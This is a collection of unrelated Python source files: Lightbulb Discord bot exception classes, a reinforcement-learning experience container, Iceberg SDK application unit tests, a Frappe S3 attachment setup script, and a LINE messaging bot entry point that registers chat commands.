edited and/or deleted (generally occurs for ephemeral responses).
"""
class ApplicationCommandCreationFailed(LightbulbError):
"""Exception raised when initialisation of application commands fails."""
class ExtensionNotFound(LightbulbError):
"""Exception raised when an attempt is made to load an extension that does not exist."""
class ExtensionAlreadyLoaded(LightbulbError):
"""Exception raised when an extension already loaded is attempted to be loaded."""
class ExtensionMissingLoad(LightbulbError):
"""Exception raised when an extension is attempted to be loaded but does not contain a load function"""
class ExtensionMissingUnload(LightbulbError):
"""Exception raised when an extension is attempted to be unloaded but does not contain an unload function"""
class ExtensionNotLoaded(LightbulbError):
"""Exception raised when an extension not already loaded is attempted to be unloaded."""
class CommandAlreadyExists(LightbulbError):
"""
Error raised when attempting to add a command to the bot but a name or alias
for the command conflicts with a command that already exists.
"""
class CommandNotFound(LightbulbError):
"""
Error raised when a command is attempted to be invoked but an implementation
is not found. This will only be raised for prefix commands.
"""
__slots__ = ("invoked_with",)
def __init__(self, *args: t.Any, invoked_with: str) -> None:
super().__init__(*args)
self.invoked_with: str = invoked_with
"""The name or alias of the command that was used."""
class CommandInvocationError(LightbulbError):
"""
Error raised when an error is encountered during command invocation. This
wraps the original exception that caused it, which is accessible through
``CommandInvocationError.__cause__`` or ``CommandInvocationError.original``.
"""
__slots__ = ("original",)
def __init__(self, *args: t.Any, original: Exception) -> None:
super().__init__(*args)
self.original: Exception = original
"""The exception that caused this to be raised. Also accessible through ``CommandInvocationError.__cause__``"""
self.__cause__ = original
class CommandIsOnCooldown(LightbulbError):
"""
Error raised when a command was on cooldown when it was attempted to be invoked.
"""
__slots__ = ("retry_after",)
def __init__(self, *args: t.Any, retry_after: float) -> None:
super().__init__(*args)
self.retry_after: float = retry_after
"""The amount of time in seconds remaining until the cooldown expires."""
class ConverterFailure(LightbulbError):
"""
Error raised when option type conversion fails while prefix command arguments are being parsed.
"""
__slots__ = ("option", "raw_value")
def __init__(self, *args: t.Any, opt: commands.base.OptionLike, raw: str) -> None:
super().__init__(*args)
self.option: commands.base.OptionLike = opt
"""The option that could not be converted."""
self.raw_value: str = raw
"""The value that could not be converted."""
class NotEnoughArguments(LightbulbError):
"""
Error raised when a prefix command expects more options than could be parsed from the user's input.
"""
__slots__ = ("missing_options",)
def __init__(self, *args: t.Any, missing: t.Sequence[commands.base.OptionLike]) -> None:
super().__init__(*args)
self.missing_options: t.Sequence[commands.base.OptionLike] = missing
"""The missing options from the command invocation."""
class MissingRequiredAttachmentArgument(LightbulbError):
"""
Error raised when a prefix command expects an attachment but none were supplied with the invocation.
"""
__slots__ = ("missing_option",)
def __init__(self, *args: t.Any, missing: commands.base.OptionLike) -> None:
super().__init__(*args)
self.missing_option: commands.base.OptionLike = missing
"""The missing attachment option from the command invocation."""
class MaxConcurrencyLimitReached(LightbulbError):
"""
Error raised when the maximum number of allowed concurrent invocations for a command
has been exceeded.
"""
class CheckFailure(LightbulbError):
"""
Error raised when a check fails before command invocation. If another error caused this
to be raised then you can access it using ``CheckFailure.__cause__``, or in the case of
multiple checks failing, via ``CheckFailure.causes``.
"""
__slots__ = ("causes",)
def __init__(self, *args: t.Any, causes: t.Optional[t.Sequence[Exception]] = None) -> None:
super().__init__(*args)
self.causes: t.Sequence[Exception] = causes or []
class InsufficientCache(CheckFailure):
"""
Error raised when the cache is required for an operation but either could not be accessed
or did not return the required object.
"""
class NotOwner(CheckFailure):
"""
Error raised when a user who is not the owner of the bot attempts to use a command
that is restricted to owners only.
"""
class OnlyInGuild(CheckFailure):
"""
Error raised when a user attempts to use a command in DMs that has been restricted
to being used only in guilds.
"""
class OnlyInDM(CheckFailure):
"""
Error raised when a user attempts to use a command in a guild that has been restricted
to being used only in DMs.
"""
class BotOnly(CheckFailure):
"""
Error raised when any entity other than a bot attempts to use a command that has been
restricted to being used only by bots.
"""
class WebhookOnly(CheckFailure):
"""
Error raised when any entity other than a webhook attempts to use a command that has been
restricted to being used only by webhooks.
"""
class HumanOnly(CheckFailure):
"""
Error raised when any entity other than a human attempts to use a command that has been
restricted to being used only by humans.
"""
class NSFWChannelOnly(CheckFailure):
"""
Error raised when a user attempts to use a command in a non-NSFW channel that has
been restricted to only being used in NSFW channels.
"""
class MissingRequiredRole(CheckFailure):
"""
Error raised when the member invoking a command is missing one or more of the required roles.
"""
class MissingRequiredPermission(CheckFailure):
"""
Error raised when the member invoking a command is missing one or more of the required permissions
in order to be able to run the command.
"""
def __init__(self, *args: t.Any, perms: hikari.Permissions) -> None:
super().__init__(*args)
self.missing_perms: hikari.Permissions = perms
"""The permissions that the member is missing."""
class BotMissingRequiredPermission(CheckFailure):
"""
Error raised when the bot is missing one or more of the required permissions
in order to be able to run the command.
"""
def __init__(self, *args: t.Any, perms: hikari.Permissions) -> None:
super().__init__(*args)
self.missing_perms: hikari.Permissions = perms
"""The permissions that the bot is missing."""
class MissingRequiredAttachment(CheckFailure):
"""
Error raised when an attachment is required for the command but none were supplied with the invocation.
"""
def __init__(self, *args: t.Any, **kwargs: t.Any) -> None:
warnings.warn(
"'MissingRequiredAttachment' is deprecated and scheduled for removal in version '2.5.0'. "
"Use an option with type 'hikari.Attachment' and catch 'MissingRequiredAttachmentArgument' instead.",
DeprecationWarning,
)
super().__init__(*args, **kwargs)
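# Minimal handling sketch (the call site is assumed; only attributes defined in
# this module are used):
#
#   try:
#       ...  # invoke a prefix command
#   except CommandIsOnCooldown as exc:
#       print(f"On cooldown, retry in {exc.retry_after:.1f}s")
#   except CheckFailure as exc:
#       print("Checks failed:", [type(c).__name__ for c in exc.causes])
#   except CommandInvocationError as exc:
#       raise exc.original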
|
py | b4036ea4f8240287ea74adc6b59d4257ed2fb7f1 | import numpy as np
class Experience:
def __init__(self, state: np.ndarray, action: np.ndarray, reward: float, next_state: np.ndarray, done: bool):
self.state = state
self.action = action
self.reward = reward
self.next_state = next_state
self.done = done
def as_tuple(self):
"""
Returns in tuple as (state, action, reward, next_state, done)
:return:
"""
return self.state, self.action, self.reward, self.next_state, self.done
class InsufficientExperiencesError(Exception):
pass
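# Usage sketch (values are illustrative):
#
#   exp = Experience(state=np.zeros(4), action=np.array([1]), reward=1.0,
#                    next_state=np.ones(4), done=False)
#   state, action, reward, next_state, done = exp.as_tuple()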
|
py | b403705e02f96187143b2a5e33406f81e434bd79 | # -*- coding: utf-8 -*-
from helper import IcebergUnitTestCase, get_api_handler
from icebergsdk.api import IcebergAPI
from icebergsdk.exceptions import IcebergClientUnauthorizedError
class TestApplication(IcebergUnitTestCase):
@classmethod
def setUpClass(cls):
cls.my_context_dict = {}
cls._objects_to_delete = []
def test_01_create(self, namespace=None, name=None, contact_user=None):
"""
Test Create an Application
"""
self.direct_login_user_1()
data = {}
if namespace:
data['namespace'] = namespace
if name:
data['name'] = name
if contact_user:
data['contact_user'] = contact_user
new_application = self.create_application(**data)
self._objects_to_delete.append(new_application)
self.my_context_dict["new_application"] = new_application
app_found = False
for app in self.api_handler.User.me().applications():
if app.id == new_application.id:
app_found = True
break
self.assertTrue(app_found)
# merchants
new_application.merchants()
return new_application
def test_02_sso_read(self):
"""
Test SSO Read an Application
- Fetch the application secret key
- SSO Login on this application
- Assert authorized read detail by contact_user
"""
self.direct_login_user_1()
new_application = self.my_context_dict["new_application"]
previous_conf = self.api_handler.conf
        new_conf = previous_conf() ## here we instantiate the previous conf so that we can modify some values without changing the class values
new_conf.ICEBERG_APPLICATION_SECRET_KEY = str(new_application.fetch_secret_key())
new_conf.ICEBERG_APPLICATION_NAMESPACE = str(new_application.namespace)
self.api_handler = IcebergAPI(conf = new_conf)
self.login_user_1()
application = self.api_handler.Application.find(new_application.id)
self.assertFalse(application==None)
# self.login_user_2()
# try:
# application = self.api_handler.Application.find(new_application.id)
# except IcebergClientUnauthorizedError:
# ## should raise this exception
# pass
# else:
# raise Exception("Application should not be accessible by user_2")
self.api_handler.conf = previous_conf
def test_03_delete(self, application=None):
"""
Test Delete an Application
"""
self.direct_login_user_1()
self.my_context_dict["new_application"].delete()
if self.my_context_dict["new_application"] in self._objects_to_delete:
## no need to delete it in tearDownClass if delete succeeded
self._objects_to_delete.remove(self.my_context_dict["new_application"])
@classmethod
def tearDownClass(cls):
if hasattr(cls, "_objects_to_delete"):
api_handler = get_api_handler()
api_handler.auth_user(username="staff_iceberg", email="[email protected]", is_staff = True)
for obj in cls._objects_to_delete:
try:
obj.delete(handler = api_handler)
# print "obj %s deleted" % obj
except:
pass
# print "couldnt delete obj %s" % obj
|
py | b4037101097d7f6401d7e8e5a235225b0634064a | # -*- coding: utf-8 -*-
# imports - standard imports
from setuptools import setup, find_packages
import re
import ast
# get version from __version__ variable in frappe/__init__.py
_version_re = re.compile(r'__version__\s+=\s+(.*)')
with open('requirements.txt') as f:
install_requires = f.read().strip().split('\n')
with open('frappe_s3_attachment/__init__.py', 'rb') as f:
version = str(ast.literal_eval(_version_re.search(
f.read().decode('utf-8')).group(1)))
setup(
name='frappe_s3_attachment',
version=version,
description='Frappe app to make file upload to S3 through attach file option.',
author='Frappe',
author_email='[email protected]',
packages=find_packages(),
zip_safe=False,
include_package_data=True,
install_requires=install_requires,
dependency_links=[]
)
|
py | b40371233c4131dcedb27e89e906952d40a0c6d8 |
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from time import sleep
from line2.client import Client, OAClient, UserClient
from line2.models.types import Receiver, Type, EventType, MessageType, ChatroomType, ParameterType, WhenOALeave
from line2.models.events import Event, Message, TextMessage, ImageMessage
from line2.models.messages import Buttons
from line2.models.chatrooms import User, Room, Group
from line2.models.command import Command, Parameter
from line2.models.database import Database
from commands.coin import coinCmd
from commands.randint import randintCmd
from commands.commandlist import commandListCmd
from commands.robj import rObjCmd
from commands.mocksb import mockSBCmd
from commands.echo import echoCmd
from commands.sort import sortCmd
from commands.sort2 import sort2Cmd
from commands.sort3 import sort3Cmd
from commands.emoji import emojiCmd
from commands.vapor import vaporCmd
from commands.meme import memeCmd
from commands.space import spaceCmd
from commands.clap import clapCmd
from commands.title import titleCmd
from commands.exactreply import exactReplyCmd
from commands.regexreply import regexReplyCmd
from commands.jpeg import jpegCmd
from commands.deepfry import deepFryCmd
from commands import deepart
from commands.deepart import deepArtCmd
from commands.lunapic import lunaPicCmd
from commands.werewolf import werewolfCmd
from commands.twentyfour import twentyFourCmd
from commands.twentyfour2 import twentyFour2Cmd
from commands.byksw import bykswCmd
from traceback import format_exc
from argparse import ArgumentParser
def HandleEvent(event):
global client
if event.eventType == EventType.message:
if event.messageType == MessageType.text:
sender = event.sender
chatroom = event.chatroom
if event.text == '/info':
c = event.client
s = 'Receiver=' + Receiver.toString[event.receiver] + "\nhasOA " + str(c.hasOA) + "\nhasUser " + str(c.hasUser) + "\n"
sender = event.sender
chatroom = event.chatroom
if sender is not None:
s = s + "Sender : " + str(sender) + "\n_2id=" + str(sender._2id) + "\nid='" + str(sender.id) + "'\nmid='" + str(sender.mid) + "'\nhasOA " + str(sender.hasOA) + "\nhasUser " + str(sender.hasUser) + "\n"
if sender != chatroom:
s = s + "Chatroom : " + str(chatroom) + "\n_2id=" + str(chatroom._2id) + "\nid='" + str(chatroom.id) + "'\nmid='" + str(chatroom.mid) + "'\nhasOA " + str(chatroom.hasOA) + "\n_1hasOA " + str(chatroom._1hasOA) + "\n_2hasOA " + str(chatroom._2hasOA) + "\nhasUser " + str(chatroom.hasUser)
event.ReplyText(s)
if event.text == '/info2':
c = event.client
s = 'Receiver=' + Receiver.toString[event.receiver] + "\nhasOA " + str(c.hasOA) + "\nhasUser " + str(c.hasUser) + "\n"
sender = event.sender
chatroom = event.chatroom
if sender is not None:
s = s + "Sender : " + str(sender) + "\n_2id=" + str(sender._2id) + "\nname : " + str(sender.name) + "\nid='" + str(sender.id) + "'\nmid='" + str(sender.mid) + "'\nhasOA " + str(sender.hasOA) + "\nhasUser " + str(sender.hasUser) + "\n"
if sender != chatroom:
s = s + "Chatroom : " + str(chatroom) + "\n_2id=" + str(chatroom._2id) + "\nname : " + str(chatroom.name) + "\nid='" + str(chatroom.id) + "'\nmid='" + str(chatroom.mid) + "'\nhasOA " + str(chatroom.hasOA) + "\nhasUser " + str(chatroom.hasUser)
event.ReplyText(s)
if event.text == "/name":
event.ReplyText(str(event.sender.GetName()))
if event.text == "/memberids":
if event.chatroom.chatroomType != ChatroomType.user:
if event.sender:
if event.sender.isAdmin:
if event.chatroom.hasOA:
if event.chatroom.chatroomType == ChatroomType.group:
event.ReplyText(str(event.client.oAClient._1client.get_group_member_ids(event.chatroom.id)))
else:
event.ReplyText(str(event.client.oAClient._1client.get_room_member_ids(event.chatroom.id)))
else:
event.ReplyText("NOT HASOA")
else:
event.ReplyText("You're not an admin")
else:
event.ReplyText("Can't identify you")
else:
event.ReplyText("Room/group only")
if event.text == "/robjtest":
if event.sender:
if True:#event.sender.isAdmin:
rObj = event.sender.rObj
if rObj:
rObj.SendText("Hello from /robj")
else:
event.ReplyText("%s, please type '/robj' in a room consisting of only you, our UserClient, and our OAClient" % event.sender.name)
else:
event.ReplyText("You're not an admin")
else:
event.ReplyText("Can't identify you")
elif event.text == "/clearrooms" and False:
if event.sender:
if event.client.hasUser:
rooms = event.client.userClient._1GetAllActiveRooms()
for room in rooms:
room.Leave()
event.ReplyText("Left %d rooms" % len(rooms))
with event.client.GetCursor() as cur:
cur.Execute("SELECT lineMid from ChatRooms WHERE type=%s AND lineMid IS NOT NULL", (ChatroomType.room,))
i = 0
for f in cur.FetchAll():
room = event.client.userClient._1GetObjByLineMid(f[0])
if room and room.chatroomType == ChatroomType.room and room.hasUser:
room.SendText("I'm leaving")
room.Leave()
i+=1
event.ReplyText("Left %d rooms (2)" % i)
else:
event.ReplyText("NOT hasUser")
else:
event.ReplyText("Can't identify you")
if event.text == "/buttons":
try:
but = Buttons("ALT TEXT HEADER", "COLUMN TEXT")
for i in range(0, 20):
but.AddButton(
"Label %d" % i,
"Pressed %d" % i,
"\nAlt Text %d" % i
)
event.ReplyButtons(but)
except Exception as e:
event.ReplyText(format_exc())
#else:
# event.ReplyImageWithUrl(event.url)
# event.ReplyText("Image message id : " + str(event.id))
if event.eventType == EventType.invited:
event.Accept()
if event.eventType == EventType.joined:
event.chatroom.SendText("Hello I just joined")
port = None
if __name__ == "__main__":
arg_parser = ArgumentParser(
usage='Usage: python ' + __file__ + ' [--port <port>] [--help]'
)
arg_parser.add_argument('-p', '--port', default=5000, help='port')
options = arg_parser.parse_args()
port = int(options.port)
global client
client = Client(
channelAccessToken = "",
channelSecret = "",
#email = "",
#password = "",
authToken = None,
certificate = None,
tries = 5,
reauthDelay = 7200,
adminIds = [],
adminMids = [],
dbUrl = '',
handler = HandleEvent,
isMac = False,
initAll = False,
autoAcceptInvitation = True,
oAAutoLeaveWhenUserLeave = True,
whenOALeave = WhenOALeave.reinvite,
port=port,
pyImgurKey = "",
pingAddress = "",
)
client.AddCommand(commandListCmd)
client.AddCommand(commandListCmd, name="commands")
client.AddCommand(rObjCmd)
client.AddCommand(rObjCmd, name='register')
client.AddCommand(coinCmd)
client.AddCommand(randintCmd)
client.AddCommand(mockSBCmd)
client.AddCommand(echoCmd)
client.AddCommand(sortCmd)
client.AddCommand(sort2Cmd)
client.AddCommand(sort3Cmd)
client.AddCommand(emojiCmd)
client.AddCommand(vaporCmd)
client.AddCommand(spaceCmd)
client.AddCommand(clapCmd)
client.AddCommand(titleCmd)
client.AddCommand(memeCmd)
client.AddAdminCommand(memeCmd)
client.AddCommand(jpegCmd)
client.AddCommand(deepFryCmd)
client.AddCommand(deepFryCmd, name="df")
deepart.daEmail = ''
deepart.daPw = ''
client.AddCommand(deepArtCmd)
client.AddCommand(deepArtCmd, name="da")
#client.AddCommand(lunaPicCmd)
#client.AddCommand(lunaPicCmd, name="lp")
client.AddContinuousTextCommand(exactReplyCmd)
client.AddCommand(exactReplyCmd)
client.AddCommand(exactReplyCmd, name="er")
client.AddContinuousTextCommand(regexReplyCmd)
client.AddCommand(regexReplyCmd)
client.AddCommand(regexReplyCmd, name="rr")
#client.AddCommand(twentyFour2Cmd)
#client.AddCommand(twentyFour2Cmd, name="242")
#client.AddContinuousTextCommand(twentyFour2Cmd)
client.AddCommand(twentyFourCmd)
client.AddCommand(twentyFourCmd, name="24")
client.AddContinuousTextCommand(twentyFourCmd)
#client.AddCommand(werewolfCmd)
client.AddCommand(bykswCmd)
def application(environ, start_response):
global client
return client.HandleWebhook(environ, start_response)
if __name__ == "__main__":
client.StartOA(thread=True, port=port)
client.StartUser(thread=5, mode=10)
print("DONE")
while True:
        sleep(1)
|